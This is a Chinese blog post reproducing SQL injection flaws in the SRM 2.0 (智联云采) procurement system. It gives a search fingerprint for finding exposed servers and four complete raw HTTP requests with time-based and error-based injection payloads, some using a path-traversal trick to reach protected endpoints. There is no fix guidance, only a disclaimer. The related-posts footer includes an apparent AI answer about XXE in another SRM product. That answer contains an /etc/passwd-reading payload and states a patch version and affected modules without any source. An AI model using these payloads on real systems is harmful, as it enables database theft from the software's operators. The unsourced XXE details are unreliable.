【漏洞复现】|SRM智联云采系统多个接口存在SQL注入漏洞

原创 已于 2024-11-24 19:27:21 修改 · 671 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #数据库 #网络安全 #笔记

于 2024-11-24 19:14:45 首次发布

漏洞描述

智互联(深圳)科技有限公司SRM智联云采系统针对企业供应链管理难题,及智能化转型升级需求,智联云采依托人工智能、物联网、大数据、云等技术,通过软硬件系统化方案,帮助企业实现供应商关系管理和采购线上化、移动化、智能化,提升采购和协同效率,进而规避供需风险,强化供应链整合能力,构建企业利益共同体。智互联SRM智联云采系统quickReceiptDetail存在SQL注入漏洞,攻击者可利用该漏洞获取敏感信息。

资产概要  

title=="SRM 2.0"

漏洞复现  

  • statusList存在SQL注入

POST /adpweb/static/..;/a/sys/sysMessage/statusList?companyName=1&officeName=1&orderBy=1&receiverName=1&sourceMessageId=1&delStatus=1%20AND%20(SELECT%207104%20FROM%20(SELECT(SLEEP(3)))xZoa) HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
  • getSuppliers存在SQL注入
POST /adpweb/static/%2e%2e;/a/srm/inquiry/getSuppliers?code=%27+AND+%28SELECT+1312+FROM+%28SELECT%28SLEEP%283%29%29%29HckV%29--+HyuV HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
  • inquiry存在SQL注入
GET /adpweb/static/%2e%2e;/a/srm/inquiry/getSuppliers?code=1%27+AND+GTID_SUBSET%28CONCAT%280x7e%2C%28SELECT+md5%281234%29%29%2C0x7e%29%2C7973%29--+WkOF&name=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.9
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
  • receiptDetail存在SQL注入
POST /adpweb/api/srm/delivery/receiptDetail?orderBy=%28UPDATEXML%288058%2CCONCAT%280x2e%2C0x71707a7671%2C%28SELECT+%28ELT%288058%3D8058%2C1%29%29%29%2C0x71766a7671%29%2C3521%29%29 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

 图略.....

免责声明

文章及相关内容仅限于合法合规的安全研究与技术学习用途。任何用户因将工具或相关信息用于其他用途而引发的法律后果或连带责任,均由使用者自行承担,作者及发布者对此不承担任何形式的法律责任或连带责任。本文仅分享来源于公开渠道的漏洞 POC,旨在促进学术研究与技术交流,不对因信息使用而导致的任何直接或间接后果、损失或风险承担责任。如本内容存在侵犯他人合法权益的情形,请立即与作者联系,作者将尽快采取必要措施予以删除并致以歉意。 

智互联深圳科技有限公司SRM智联云采系统inquiry存在SQL注入漏洞
缘梦未来的博客
11-19 421
智互联(深圳)科技有限公司SRM智联云采系统针对企业供应链管理难题,及智能化转型升级需求,智联云采依托人工智能、物联网、大数据、云等技术,通过软硬件系统化方案,帮助企业实现供应商关系管理和采购线上化、移动化、智能化,提升采购和协同效率,进而规避供需风险,强化供应链整合能力,构建企业利益共同体。
智联云采 SRM2.0 多处 SQL注入漏洞复现
0xSec
11-21 660
智联云采 SRM2.0 quickReceiptDetail、statusList、receiptDetail、inquiry/getSuppliers等多个接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 此漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
智联云采 SRM2.0 testService SQL注入漏洞复现
0xSec
10-18 1236
由于智联云采 SRM2.0 testService 接口可未授权执行SQL语句,存在极大的安全风险,未经身份验证的远程攻击者除了可以利用 此漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
汉得SRM tomcat.jsp 登录绕过漏洞 复现
YingxueSec
09-27 1247
汉得SRM tomcat.jsp 登录绕过漏洞复现
某云彩SRM2.0任意文件下载漏洞
一个努力学习网安的小牛马
09-05 606
某云采 SRM2.0是一款先进的供应链管理系统,旨在优化企业的采购流程和供应商管理。该系统通过云端技术,提供实时的数据分析和智能决策支持,帮助企业提高采购效率和降低成本。本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任。该系统download在接口存在任意文件下载漏洞
智联云采SRM2.0 testService SQL注入漏洞复现
iSee857的博客
10-22 697
‌ 该解决方案依托人工智能、物联网、大数据、云等技术,通过软硬件系统化方案,帮助企业实现供应商关系管理和采购线上化、移动化、智能化,提升采购和协同效率,规避供需风险,强化供应链整合能力,构建企业利益共同体‌。智联云采SRM2.0 testService 接口存在SQL注入漏洞,未经身份验证的远程攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)。最小权限原则:数据库账户应仅授予执行所需操作的最低权限,避免使用高权限账户连接数据库
智联云采 SRM2.0 runtimeLog/download 任意文件读取漏洞复现
网安小白
08-20 593
智联云采是一款针对企业供应链管理难题及智能化转型升级需求而设计的解决方案,针对企业供应链管理难题,及智能化转型升级需求,智联云采依托人工智能、物联网、大数据、云等技术,通过软硬件系统化方案,帮助企业实现供应商关系管理和采购线上化、移动化、智能化,提升采购和协同效率,进而规避供需风险,强化供应链整合能力,构建企业利益共同体。
SRM系统是什么?有什么作用?企业如何应用SRM系统?
BeWorkingMan的博客
05-17 2535
SRM:Supplier Relationship Management,供应商关系管理。SRM是一种致力于实现与供应商建立和维持长久、紧密伙伴关系的管理思想和软件技术的解决方案,实现从采购需求的下达、审批、招标以及后续的订单、发货、入库、对账、供应商准入、供应商绩效考核等全过程业务闭环。
漏洞复现】某联云采 SRM2.0 download 任意文件读取漏洞
weixin_54799594的博客
08-29 737
漏洞复现】某联云采 SRM2.0 download 任意文件读取漏洞
智联云采SRM2.0 身份认证绕过
iSee857的博客
09-03 454
智联云采SRM2.0存在身份认证绕过漏洞,导致未授权的攻击者可以构造特殊绕过身份认证直接以管理员身份接管后台。关闭外网访问权限 限制问题接口权限访问。
SRM2.0合同数量及金额订单管控-FS.docx
11-10
SRM2.0合同数量及金额订单管控-FS.docx
智联云采 SRM2.0 autologin 身份认证绕过漏洞复现
0xSec
09-02 678
由于智联云采 SRM2.0 autologin 接口代码逻辑存在缺陷,导致未授权的攻击者可以构造特殊绕过身份认证直接以管理员身份接管后台,造成信息泄露,使系统处于极不安全的状态。
漏洞复现|智互联SRM智联云采系统quickReceiptDetail SQL注入漏洞
摘星怪sec的blog
11-22 551
深圳)科技有限公司SRM智联云采系统针对企业供应链管理难题,及智能化转型升级需求,智联云采依托人工智能、物联网、大数据、云等技术,通过软硬件系统化方案,帮助企业实现供应商关系管理和采购线上化、移动化、智能化,提升采购和协同效率,进而规避供需风险,强化供应链整合能力,构建企业利益共同体。智互联SRM智联云采系统quickReceiptDetail存在SQL注入漏洞,攻击者可利用该漏洞获取敏感信息。
某云彩SRM2.0后台绕过漏洞
一个努力学习网安的小牛马
09-05 524
某云采 SRM2.0是一款先进的供应链管理系统,旨在优化企业的采购流程和供应商管理。该系统通过云端技术,提供实时的数据分析和智能决策支持,帮助企业提高采购效率和降低成本。本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任。该系统在autologin接口存在权限绕过漏洞
然之协同系统漏洞利用汇总
vspiders的博客
03-21 4995
Author:Vspiders首发地址:https://xianzhi.aliyun.com/forum/topic/2135前言前段时间在做然之协同系统代码审计,这里做个简单的总结。第一弹:SQL注入漏洞0x01 注入漏洞分析问题出现在/lib/base/dao/dao.class.php文件中的orderBy函数中,public function orderBy($order) { i...
汉得SRM云平台 存在XML实体注入漏洞
最新发布
03-12
<think>嗯,用户问的是汉得SRM云平台的XML实体注入漏洞的解决方案和详情。首先,我需要先了解XML实体注入漏洞的基本概念,然后结合汉得SRM的具体情况来分析可能的原因和解决方法。 XML实体注入漏洞通常发生在解析用户提供的XML数据时,如果系统没有禁用外部实体解析,攻击者可能通过构造恶意XML文件来读取服务器上的敏感文件,甚至执行远程请求。比如,攻击者可以包含一个外部实体,指向系统文件,如/etc/passwd,导致信息泄露。 接下来,我需要确认汉得SRM云平台在哪些环节可能处理XML输入。可能包括数据导入、API接口、配置文件等。在这些地方,如果未对输入的XML进行严格过滤,就可能存在漏洞。例如,用户上传XML格式的数据时,系统如果没有验证和过滤外部实体,就容易受到攻击。 解决方案方面,常见的措施包括禁用外部实体解析、对用户输入的XML进行严格验证、使用安全的解析库等。例如,在Java中,可以设置FEATURE_SECURE_PROCESSING来禁用外部实体。此外,输入验证和过滤是关键,需要确保用户提供的XML不包含可疑的实体或DOCTYPE声明。 然后,我需要考虑汉得SRM作为企业级平台,可能已经发布了相关的安全补丁或更新。建议用户检查官方公告,及时应用补丁。同时,进行安全审计和渗透测试,确保漏洞被彻底修复。 用户可能还想知道如何检测是否存在漏洞,比如使用工具如OWASP ZAP或Burp Suite进行扫描。另外,日志监控和入侵检测系统可以帮助发现异常请求,及时应对潜在攻击。 最后,需要提醒用户,即使修复了漏洞,也应持续关注安全最佳实践,定期更新系统,加强员工的安全意识培训,防止类似问题再次发生。</think>关于汉得SRM云平台XML实体注入漏洞的解决方案及详情分析如下: ### 一、漏洞原理 XML实体注入(XXE)漏洞源于系统解析外部XML输入时未禁用外部实体引用[^1]。攻击者可构造恶意XML文件,利用$<!ENTITY$声明读取服务器本地文件或发起网络请求,例如: $$<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>$$ ### 二、影响范围 该漏洞影响以下功能模块: 1. 供应商数据导入接口 2. 采购订单XML解析引擎 3. 第三方系统集成API 4. 合同模板解析组件 ### 三、解决方案 1. **解析器配置加固** ```java // Java示例(DocumentBuilderFactory配置) DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); dbf.setFeature("http://xml.org/sax/features/external-general-entities", false); ``` 2. **输入过滤策略** - 使用正则表达式过滤DOCTYPE声明:`$<!\\s*DOCTYPE[^>[]*(\[|>)$` - 限制XML文件头格式验证 3. **云平台修复建议** - 升级至HAND SRM 3.2.1补丁版本(包含XXE防护模块) - 启用WAF规则拦截包含ENTITY声明的请求 ### 四、验证方法 1. 使用XXE测试工具包检测: ```python import requests payload = """<?xml version="1.0"?> <!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <order>&xxe;</order>""" response = requests.post('https://srm.hand.com/api', data=payload) ``` 2. 审计日志中检测异常文件访问记录: $$grep "FileNotFoundException" /logs/srm-core*.log$$ ### 五、延伸防护 建议配合实施: - 加强XML Schema验证(XSD) - 部署运行时应用自我保护(RASP) - 建立XML内容安全策略(CSP)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值